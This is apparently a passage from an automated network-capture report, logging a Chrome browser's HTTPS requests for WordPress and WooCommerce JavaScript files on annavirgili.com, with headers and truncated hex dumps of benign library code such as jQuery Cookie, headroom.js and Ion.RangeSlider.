                                                                                                          2024-12-12 11:58:33 UTC16384INData Raw: 65 6c 65 6d 65 6e 74 29 2c 67 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 61 64 64 43 6c 61 73 73 28 76 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 70 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 6d 74 29 3b 76 61 72 20 69 3d 74 68 69 73 2e 5f 74 72 69 67 67 65 72 41 72 72 61 79 2e 6c 65 6e 67 74 68 3b 69 66 28 30 3c 69 29 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 69 3b 6f 2b 2b 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 5f 74 72 69 67 67 65 72 41 72 72 61 79 5b 6f 5d 2c 73 3d 5f 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 72 29 3b 69 66 28 6e 75 6c 6c 21 3d 3d 73 29 67 28 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 73 29 29 29 2e 68 61 73 43 6c 61 73
                                                                                                          Data Ascii: element),g(this._element).addClass(vt).removeClass(pt).removeClass(mt);var i=this._triggerArray.length;if(0<i)for(var o=0;o<i;o++){var r=this._triggerArray[o],s=_.getSelectorFromElement(r);if(null!==s)g([].slice.call(document.querySelectorAll(s))).hasClas
                                                                                                          2024-12-12 11:58:33 UTC16384INData Raw: 70 61 64 64 69 6e 67 2d 72 69 67 68 74 22 29 3b 67 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 72 65 6d 6f 76 65 44 61 74 61 28 22 70 61 64 64 69 6e 67 2d 72 69 67 68 74 22 29 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 2e 70 61 64 64 69 6e 67 52 69 67 68 74 3d 6e 7c 7c 22 22 7d 2c 74 2e 5f 67 65 74 53 63 72 6f 6c 6c 62 61 72 57 69 64 74 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 74 2e 63 6c 61 73 73 4e 61 6d 65 3d 61 65 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 3b 76 61 72 20 65 3d 74 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 2e 77 69 64 74 68 2d 74 2e 63 6c
                                                                                                          Data Ascii: padding-right");g(document.body).removeData("padding-right"),document.body.style.paddingRight=n||""},t._getScrollbarWidth=function(){var t=document.createElement("div");t.className=ae,document.body.appendChild(t);var e=t.getBoundingClientRect().width-t.cl
                                                                                                          2024-12-12 11:58:33 UTC8920INData Raw: 6c 69 63 65 2e 63 61 6c 6c 28 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 74 68 69 73 2e 5f 73 65 6c 65 63 74 6f 72 29 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 6e 3d 5f 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 29 3b 69 66 28 6e 26 26 28 65 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 29 29 2c 65 29 7b 76 61 72 20 69 3d 65 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 69 66 28 69 2e 77 69 64 74 68 7c 7c 69 2e 68 65 69 67 68 74 29 72 65 74 75 72 6e 5b 67 28 65 29 5b 6f 5d 28 29 2e 74 6f 70 2b 72 2c 6e 5d 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 29
                                                                                                          Data Ascii: lice.call(document.querySelectorAll(this._selector)).map(function(t){var e,n=_.getSelectorFromElement(t);if(n&&(e=document.querySelector(n)),e){var i=e.getBoundingClientRect();if(i.width||i.height)return[g(e)[o]().top+r,n]}return null}).filter(function(t)


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          110192.168.2.2449905147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:33 UTC578OUTGET /wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js?ver=1.4.1-wc.6.6.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:34 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:34 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 24 Jun 2022 09:41:11 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1392
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:34 UTC1392INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 43 6f 6f 6b 69 65 20 50 6c 75 67 69 6e 20 76 31 2e 34 2e 31 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 61 72 68 61 72 74 6c 2f 6a 71 75 65 72 79 2d 63 6f 6f 6b 69 65 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 33 20 4b 6c 61 75 73 20 48 61 72 74 6c 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 28 72 65 71 75 69
                                                                                                          Data Ascii: /*! * jQuery Cookie Plugin v1.4.1 * https://github.com/carhartl/jquery-cookie * * Copyright 2013 Klaus Hartl * Released under the MIT license */!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?e(requi


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          111192.168.2.2449904147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:33 UTC713OUTGET /wp-content/themes/ciena/assets/js/theme.js?ver=1.0.8 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:34 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:34 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Sat, 26 Mar 2022 17:38:09 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 47022
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:34 UTC16384INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 20 20 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 20 20 20 20 76 61 72 20 24 77 69 6e 64 6f 77 20 20 20 3d 20 24 28 20 77 69 6e 64 6f 77 20 29 2c 0a 20 20 20 20 20 20 20 20 24 64 6f 63 75 6d 65 6e 74 20 3d 20 24 28 20 64 6f 63 75 6d 65 6e 74 20 29 2c 0a 20 20 20 20 20 20 20 20 24 62 6f 64 79 20 20 20 20 20 3d 20 24 28 20 27 62 6f 64 79 27 20 29 3b 0a 20 20 20 20 76 61 72 20 43 49 45 4e 41 20 3d 20 43 49 45 4e 41 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 43 49 45 4e 41 2e 69 6e 69 74 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 5f 74 20 3d 20 74 68 69 73 3b 0a 20 20 20 20 20 20 20 20 5f 74 2e 6f 66 66 43 61 6e 76 61 73 28 29 3b 0a 20 20 20 20 20 20 20 20 5f 74 2e 73 74
                                                                                                          Data Ascii: (function ($) { "use strict"; var $window = $( window ), $document = $( document ), $body = $( 'body' ); var CIENA = CIENA || {}; CIENA.init = function () { var _t = this; _t.offCanvas(); _t.st
                                                                                                          2024-12-12 11:58:34 UTC16384INData Raw: 5f 66 6f 72 6d 5f 77 72 61 70 70 65 72 2e 63 6c 6f 73 65 73 74 28 27 2e 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 72 65 73 75 6c 74 5f 73 65 61 72 63 68 5f 61 63 74 69 76 65 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 3b 0a 20 20 20 20 43 49 45 4e 41 2e 46 69 6c 6c 74 65 72 42 74 6e 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 24 28 27 2e 63 69 65 6e 61 2d 66 69 6c 74 65 72 2d 62 74 6e 27 29 2e 6c 65 6e 67 74 68 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 66 69 6c 74 65 72 5f 62 74 6e 20 3d 20 24 28 27 2e 63 69 65 6e 61 2d 66 69 6c 74 65 72 2d 62 74 6e 27 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: _form_wrapper.closest('.modal-content').removeClass('result_search_active'); } }); }; CIENA.FillterBtn = function() { if ($('.ciena-filter-btn').length){ var filter_btn = $('.ciena-filter-btn'),
                                                                                                          2024-12-12 11:58:34 UTC14254INData Raw: 69 73 74 5f 63 6f 75 6e 74 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 24 62 6f 64 79 2e 6f 6e 28 27 72 65 6d 6f 76 65 64 5f 66 72 6f 6d 5f 77 69 73 68 6c 69 73 74 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 6c 2c 20 65 6c 5f 77 72 61 70 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 75 70 64 61 74 65 5f 77 69 73 68 6c 69 73 74 5f 63 6f 75 6e 74 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 24 62 6f 64 79 2e 6f 6e 28 27 74 69 6e 76 77 6c 5f 77 69 73 68 6c 69 73 74 5f 61 64 64 65 64 5f 73 74 61 74 75 73 27 2c 66 75 6e 63 74 69 6f 6e 20 28 65 6c 2c 20 65 6c 5f 77 72 61 70 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 75 70 64 61 74 65 5f 77 69 73 68 6c 69 73 74 5f 63 6f 75 6e 74 28 29 3b 0a 20 20 20 20
                                                                                                          Data Ascii: ist_count(); }); $body.on('removed_from_wishlist', function (el, el_wrap) { update_wishlist_count(); }); $body.on('tinvwl_wishlist_added_status',function (el, el_wrap) { update_wishlist_count();


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          112192.168.2.2449906147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:34 UTC763OUTGET /wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/js/ion.rangeSlider.min.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:34 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:34 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 41171
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:34 UTC16384INData Raw: 2f 2f 20 49 6f 6e 2e 52 61 6e 67 65 53 6c 69 64 65 72 2c 20 32 2e 33 2e 31 2c 20 c2 a9 20 44 65 6e 69 73 20 49 6e 65 73 68 69 6e 2c 20 32 30 31 30 20 2d 20 32 30 31 39 2c 20 49 6f 6e 44 65 6e 2e 63 6f 6d 2c 20 42 75 69 6c 64 20 64 61 74 65 3a 20 32 30 31 39 2d 31 32 2d 31 39 20 31 36 3a 35 36 3a 34 34 0a 21 66 75 6e 63 74 69 6f 6e 28 69 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 26 26 6a 51 75 65 72 79 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 7c 7c 21 64 65 66 69 6e 65 2e 61 6d 64 3f 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 26 26 6a 51 75 65 72 79 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 69 28 6a 51
                                                                                                          Data Ascii: // Ion.RangeSlider, 2.3.1, Denis Ineshin, 2010 - 2019, IonDen.com, Build date: 2019-12-19 16:56:44!function(i){"undefined"!=typeof jQuery&&jQuery||"function"!=typeof define||!define.amd?"undefined"!=typeof jQuery&&jQuery||"object"!=typeof exports?i(jQ
                                                                                                          2024-12-12 11:58:34 UTC16384INData Raw: 6e 74 28 29 29 2c 74 68 69 73 2e 63 6f 6f 72 64 73 2e 77 5f 72 73 29 29 7b 74 68 69 73 2e 63 61 6c 63 50 6f 69 6e 74 65 72 50 65 72 63 65 6e 74 28 29 3b 76 61 72 20 69 3d 74 68 69 73 2e 67 65 74 48 61 6e 64 6c 65 58 28 29 3b 73 77 69 74 63 68 28 22 62 6f 74 68 22 3d 3d 3d 74 68 69 73 2e 74 61 72 67 65 74 26 26 28 74 68 69 73 2e 63 6f 6f 72 64 73 2e 70 5f 67 61 70 3d 30 2c 69 3d 74 68 69 73 2e 67 65 74 48 61 6e 64 6c 65 58 28 29 29 2c 22 63 6c 69 63 6b 22 3d 3d 3d 74 68 69 73 2e 74 61 72 67 65 74 26 26 28 74 68 69 73 2e 63 6f 6f 72 64 73 2e 70 5f 67 61 70 3d 74 68 69 73 2e 63 6f 6f 72 64 73 2e 70 5f 68 61 6e 64 6c 65 2f 32 2c 69 3d 74 68 69 73 2e 67 65 74 48 61 6e 64 6c 65 58 28 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 64 72 61 67 5f 69 6e 74 65 72 76
                                                                                                          Data Ascii: nt()),this.coords.w_rs)){this.calcPointerPercent();var i=this.getHandleX();switch("both"===this.target&&(this.coords.p_gap=0,i=this.getHandleX()),"click"===this.target&&(this.coords.p_gap=this.coords.p_handle/2,i=this.getHandleX(),this.options.drag_interv
                                                                                                          2024-12-12 11:58:34 UTC8403INData Raw: 6e 29 2c 65 3d 2b 28 65 2b 61 29 2e 74 6f 46 69 78 65 64 28 6e 29 29 3b 76 61 72 20 63 2c 6c 3d 28 65 2d 6f 29 2f 31 30 30 2a 74 2b 6f 2c 5f 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 74 65 70 2e 74 6f 53 74 72 69 6e 67 28 29 2e 73 70 6c 69 74 28 22 2e 22 29 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 3d 5f 3f 2b 6c 2e 74 6f 46 69 78 65 64 28 5f 2e 6c 65 6e 67 74 68 29 3a 28 6c 2f 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 74 65 70 2c 2b 28 6c 2a 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 74 65 70 29 2e 74 6f 46 69 78 65 64 28 30 29 29 2c 61 26 26 28 6c 2d 3d 61 29 2c 28 63 3d 5f 3f 2b 6c 2e 74 6f 46 69 78 65 64 28 5f 2e 6c 65 6e 67 74 68 29 3a 74 68 69 73 2e 74 6f 46 69 78 65 64 28 6c 29 29 3c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6d 69 6e 3f 63 3d 74 68
                                                                                                          Data Ascii: n),e=+(e+a).toFixed(n));var c,l=(e-o)/100*t+o,_=this.options.step.toString().split(".")[1];return l=_?+l.toFixed(_.length):(l/=this.options.step,+(l*=this.options.step).toFixed(0)),a&&(l-=a),(c=_?+l.toFixed(_.length):this.toFixed(l))<this.options.min?c=th


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          113192.168.2.2449907147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:34 UTC540OUTGET /wp-content/themes/ciena/assets/js/headroom.js?ver=0.11.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:34 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:34 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Sat, 26 Mar 2022 17:38:07 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 10995
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:34 UTC10995INData Raw: 2f 2a 21 0a 20 2a 20 68 65 61 64 72 6f 6f 6d 2e 6a 73 20 76 30 2e 31 31 2e 30 20 2d 20 47 69 76 65 20 79 6f 75 72 20 70 61 67 65 20 73 6f 6d 65 20 68 65 61 64 72 6f 6f 6d 2e 20 48 69 64 65 20 79 6f 75 72 20 68 65 61 64 65 72 20 75 6e 74 69 6c 20 79 6f 75 20 6e 65 65 64 20 69 74 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 32 30 20 4e 69 63 6b 20 57 69 6c 6c 69 61 6d 73 20 2d 20 68 74 74 70 3a 2f 2f 77 69 63 6b 79 2e 6e 69 6c 6c 69 61 2e 6d 73 2f 68 65 61 64 72 6f 6f 6d 2e 6a 73 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 4d 49 54 0a 20 2a 2f 0a 0a 28 66 75 6e 63 74 69 6f 6e 20 28 67 6c 6f 62 61 6c 2c 20 66 61 63 74 6f 72 79 29 20 7b 0a 20 20 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 20 3d 3d 3d 20 27 6f 62 6a 65 63 74 27 20 26 26 20 74 79 70 65
                                                                                                          Data Ascii: /*! * headroom.js v0.11.0 - Give your page some headroom. Hide your header until you need it * Copyright (c) 2020 Nick Williams - http://wicky.nillia.ms/headroom.js * License: MIT */(function (global, factory) { typeof exports === 'object' && type


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          114192.168.2.2449909147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:34 UTC570OUTGET /wp-content/themes/ciena/assets/vendors/js-offcanvas/js-offcanvas.pkgd.min.js?ver=1.2.9 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:35 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:34 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Sat, 26 Mar 2022 17:38:49 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 15810
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:35 UTC15810INData Raw: 2f 2a 21 20 6a 73 2d 4f 66 66 63 61 6e 76 61 73 20 2d 20 76 31 2e 32 2e 31 31 20 2d 20 32 30 31 39 2d 31 30 2d 31 36 0a 6a 51 75 65 72 79 20 41 63 63 65 73 69 62 6c 65 20 4f 66 66 63 61 6e 76 61 73 20 50 61 6e 65 6c 73 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 76 6d 69 74 73 61 72 61 73 2f 6a 73 2d 6f 66 66 63 61 6e 76 61 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 39 20 56 61 73 69 6c 65 69 6f 73 20 4d 69 74 73 61 72 61 73 20 28 40 76 6d 69 74 73 61 72 61 73 29 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 62 3d 61 2e 75 74 69 6c 73 7c 7c 7b 7d 3b 62 2e 63 6c 61 73 73 65 73 3d 7b 68 69 64 64 65 6e 56 69 73
                                                                                                          Data Ascii: /*! js-Offcanvas - v1.2.11 - 2019-10-16jQuery Accesible Offcanvas Panels * https://github.com/vmitsaras/js-offcanvas * Copyright (c) 2019 Vasileios Mitsaras (@vmitsaras) * MIT License */!function(a){"use strict";var b=a.utils||{};b.classes={hiddenVis


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          115192.168.2.2449908147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:34 UTC757OUTGET /wp-content/plugins/woocommerce-products-filter/js/tooltip/js/tooltipster.bundle.min.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:35 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:34 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 39773
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:35 UTC16384INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 62 28 61 29 7d 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 62 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 3a 62 28 6a 51 75 65 72 79 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 74 68 69 73 2e 24 63 6f 6e 74 61 69 6e 65 72 2c 74 68 69 73 2e 63 6f 6e 73 74 72 61 69 6e 74 73 3d 6e 75 6c 6c 2c 74 68 69
                                                                                                          Data Ascii: "use strict";!function(a,b){"function"==typeof define&&define.amd?define(["jquery"],function(a){return b(a)}):"object"==typeof exports?module.exports=b(require("jquery")):b(jQuery)}(this,function(a){function b(a){this.$container,this.constraints=null,thi
